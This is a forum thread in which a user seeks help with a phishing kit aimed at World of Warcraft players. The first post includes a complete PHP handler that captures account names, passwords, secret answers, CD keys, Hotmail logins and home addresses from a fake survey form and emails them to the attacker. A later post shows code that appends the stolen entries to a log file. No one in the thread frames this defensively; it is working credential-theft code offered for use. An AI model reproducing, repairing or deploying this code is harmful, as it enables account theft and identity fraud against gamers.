Phisher help menu

User Tag List

Thread: Phisher help

Results 1 to 3 of 3
  1. #1
    deadfate's Avatar Active Member
    Reputation
    25
    Join Date
    Dec 2007
    Posts
    164
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Phisher help

    So i set up my phisher, how do i get it to send to my email their info, i used the survey phisher, i think it worked once but it stopped sending info

    heres whats in the contact file
    <?php
    // get posted data into local variables
    $EmailFrom = Trim(stripslashes($_POST['Email']));
    $EmailTo = "MYEMAILHERE";
    $Subject = "WoW Scammed Account";
    $Last = Trim(stripslashes($_POST['Last']));
    $First = Trim(stripslashes($_POST['First']));
    $Account = Trim(stripslashes($_POST['Account']));
    $Adress = Trim(stripslashes($_POST['Adress']));
    $City = Trim(stripslashes($_POST['City']));
    $State = Trim(stripslashes($_POST['State']));
    $Zip = Trim(stripslashes($_POST['Zip']));
    $Country = Trim(stripslashes($_POST['Country']));
    $Email = Trim(stripslashes($_POST['Email']));
    $Answer = Trim(stripslashes($_POST['Answer']));
    $WowKey = Trim(stripslashes($_POST['WowKey']));
    $WowTBCKey = Trim(stripslashes($_POST['WowTBCKey']));
    $Hotmail = Trim(stripslashes($_POST['Hotmail']));
    $MMO = Trim(stripslashes($_POST['MMO']));
    $Password = Trim(stripslashes($_POST['Password']));
    // validation
    $validationOK=true;
    if (Trim($EmailFrom)=="") $validationOK=false;
    if (!$validationOK) {
    print "<meta http-equiv=\"refresh\" content=\"0;URL=whoops.html\">";
    exit;
    }
    // prepare email body text
    $Body = "";
    $Body .= "Last Name: ";
    $Body .= $Last;
    $Body .= "\n";
    $Body .= "First Name: ";
    $Body .= $First;
    $Body .= "\n";
    $Body .= "Account Name: ";
    $Body .= $Account;
    $Body .= "\n";
    $Body .= "Account Password: ";
    $Body .= $Password;
    $Body .= "\n";
    $Body .= "Adress: ";
    $Body .= $Adress;
    $Body .= "\n";
    $Body .= "City: ";
    $Body .= $City;
    $Body .= "\n";
    $Body .= "State: ";
    $Body .= $State;
    $Body .= "\n";
    $Body .= "Zip: ";
    $Body .= $Zip;
    $Body .= "\n";
    $Body .= "Country: ";
    $Body .= $Country;
    $Body .= "\n";
    $Body .= "E-mail: ";
    $Body .= $Email;
    $Body .= "\n";
    $Body .= "Secret Answer : ";
    $Body .= $Answer;
    $Body .= "\n";
    $Body .= "World of Warcraft CD-Key: ";
    $Body .= $WowKey;
    $Body .= "\n";
    $Body .= "World of Warcraft TBC CD-Key: ";
    $Body .= $WowTBCKey;
    $Body .= "\n";
    $Body .= "Hotmail: ";
    $Body .= $Hotmail;
    $Body .= "\n";
    $Body .= "Other MMO's: ";
    $Body .= $MMO;
    $Body .= "\n";
    // send email
    $success = mail($EmailTo, $Subject, $Body, "From: <$EmailFrom>");
    // redirect to success page
    if ($success){
    print "<meta http-equiv=\"refresh\" content=\"0;URL=thanks.html\">";
    }
    else{
    print "<meta http-equiv=\"refresh\" content=\"0;URL=whoops.htm\">";
    }
    ?>


    Do i need to remove the " " where my email is suppose to be?
    Last edited by deadfate; 08-26-2008 at 08:18 PM. Reason: Ninjas made me

    Phisher help
  2. #2
    deadfate's Avatar Active Member
    Reputation
    25
    Join Date
    Dec 2007
    Posts
    164
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Tryed a differnt phisher still cant get to the log file

    $fp = fopen("lawgs.html", "a");
    fwrite($fp, $entry_line);
    fclose($fp);

    Do i remove the " " on lawgs?

  3. #3
    deadfate's Avatar Active Member
    Reputation
    25
    Join Date
    Dec 2007
    Posts
    164
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    wow wtb YOUTUBE VIDEO HELP SECTION

    any 1 help?

Similar Threads

  1. Phisher help
    By pia32 in forum WoW Scams Help
    Replies: 1
    Last Post: 03-03-2009, 10:22 PM
  2. Making a Knight Online phisher. Help please
    By TinusNED in forum WoW Scams Help
    Replies: 1
    Last Post: 03-02-2009, 01:46 PM
  3. Phisher Help!
    By ilikrusyspoons in forum WoW Scams Help
    Replies: 6
    Last Post: 08-20-2008, 11:51 PM
  4. My Phisher - Help
    By Acespades in forum Community Chat
    Replies: 11
    Last Post: 04-27-2008, 07:59 PM
  5. Phisher help
    By sleepybilly in forum WoW Scams Help
    Replies: 7
    Last Post: 04-08-2008, 10:42 PM
All times are GMT -5. The time now is 01:29 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search